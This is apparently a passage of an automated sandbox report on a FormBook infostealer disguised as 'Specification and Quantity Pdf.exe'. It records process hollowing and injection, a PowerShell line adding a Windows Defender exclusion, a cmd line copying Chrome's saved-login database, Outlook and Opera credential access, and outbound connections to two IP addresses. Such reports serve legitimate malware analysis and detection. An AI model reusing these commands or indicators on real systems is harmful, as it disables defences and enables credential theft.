Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038276B2 mov eax, dword ptr fs:[00000030h]	6_2_038276B2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038276B2 mov eax, dword ptr fs:[00000030h]	6_2_038276B2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038276B2 mov eax, dword ptr fs:[00000030h]	6_2_038276B2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038666B0 mov eax, dword ptr fs:[00000030h]	6_2_038666B0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]	6_2_0386A6C7
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386A6C7 mov eax, dword ptr fs:[00000030h]	6_2_0386A6C7
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0383B6C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0383B6C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0383B6C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0383B6C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0383B6C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0383B6C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F16CC mov eax, dword ptr fs:[00000030h]	6_2_038F16CC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F16CC mov eax, dword ptr fs:[00000030h]	6_2_038F16CC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F16CC mov eax, dword ptr fs:[00000030h]	6_2_038F16CC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F16CC mov eax, dword ptr fs:[00000030h]	6_2_038F16CC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EF6C7 mov eax, dword ptr fs:[00000030h]	6_2_038EF6C7
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038616CF mov eax, dword ptr fs:[00000030h]	6_2_038616CF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C36EE mov eax, dword ptr fs:[00000030h]	6_2_038C36EE
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C36EE mov eax, dword ptr fs:[00000030h]	6_2_038C36EE
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C36EE mov eax, dword ptr fs:[00000030h]	6_2_038C36EE
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C36EE mov eax, dword ptr fs:[00000030h]	6_2_038C36EE
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C36EE mov eax, dword ptr fs:[00000030h]	6_2_038C36EE
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C36EE mov eax, dword ptr fs:[00000030h]	6_2_038C36EE
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385D6E0 mov eax, dword ptr fs:[00000030h]	6_2_0385D6E0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385D6E0 mov eax, dword ptr fs:[00000030h]	6_2_0385D6E0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038636EF mov eax, dword ptr fs:[00000030h]	6_2_038636EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	6_2_038AE6F2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	6_2_038AE6F2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	6_2_038AE6F2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	6_2_038AE6F2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B06F1 mov eax, dword ptr fs:[00000030h]	6_2_038B06F1
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B06F1 mov eax, dword ptr fs:[00000030h]	6_2_038B06F1
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038ED6F0 mov eax, dword ptr fs:[00000030h]	6_2_038ED6F0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03861607 mov eax, dword ptr fs:[00000030h]	6_2_03861607
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AE609 mov eax, dword ptr fs:[00000030h]	6_2_038AE609
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386F603 mov eax, dword ptr fs:[00000030h]	6_2_0386F603
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]	6_2_0384260B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]	6_2_0384260B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]	6_2_0384260B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]	6_2_0384260B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]	6_2_0384260B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]	6_2_0384260B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]	6_2_0384260B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03833616 mov eax, dword ptr fs:[00000030h]	6_2_03833616
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03833616 mov eax, dword ptr fs:[00000030h]	6_2_03833616
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872619 mov eax, dword ptr fs:[00000030h]	6_2_03872619
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384E627 mov eax, dword ptr fs:[00000030h]	6_2_0384E627
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]	6_2_0382F626
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]	6_2_0382F626
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]	6_2_0382F626
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]	6_2_0382F626
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]	6_2_0382F626
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]	6_2_0382F626
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]	6_2_0382F626
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]	6_2_0382F626
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]	6_2_0382F626
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03866620 mov eax, dword ptr fs:[00000030h]	6_2_03866620
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03905636 mov eax, dword ptr fs:[00000030h]	6_2_03905636
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03868620 mov eax, dword ptr fs:[00000030h]	6_2_03868620
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383262C mov eax, dword ptr fs:[00000030h]	6_2_0383262C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384C640 mov eax, dword ptr fs:[00000030h]	6_2_0384C640
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F866E mov eax, dword ptr fs:[00000030h]	6_2_038F866E

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 10_2_00E948B7 GetLastError,SetLastError,GetProcessHeap,HeapFree,

10_2_00E948B7

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773CBB64C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF773CBB64C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00E961C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00E961C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00E96510 SetUnhandledExceptionFilter,	10_2_00E96510

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 203.161.60.191 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80			Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Memory allocated: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF722870000 value starts with: 4D5A	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Thread register set: target process: 4056			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 4056			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section unmapped: C:\Windows\System32\svchost.exe base address: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Section unmapped: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: E90000	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Memory written: C:\Windows\System32\svchost.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 30EF008	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF722870000	Jump to behavior

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: explorer.exe, 00000008.00000002.3754457139.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2276796818.0000000009021000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275947089.0000000009013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.3751213172.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1315693106.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.3751213172.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1315693106.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 00000008.00000000.1314901102.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3749514616.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000008.00000002.3751213172.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1315693106.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: GetLocaleInfoEx,		0_2_00007FF773CE8FB0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: GetLocaleInfoEx,		0_2_00007FF773CE9080

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

Code function: 0_2_00007FF773CBB27C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF773CBB27C

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	812 Process Injection	3 Obfuscated Files or Information	Security Account Manager	224 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	341 Security Software Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	211 Masquerading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	41 Virtualization/Sandbox Evasion	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	812 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Rundll32	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Specification and Quantity Pdf.exe	68%	Virustotal		Browse
Specification and Quantity Pdf.exe	66%	ReversingLabs	Win64.Backdoor.FormBook

Dropped Files

Source	Detection	Scanner	Label	Link
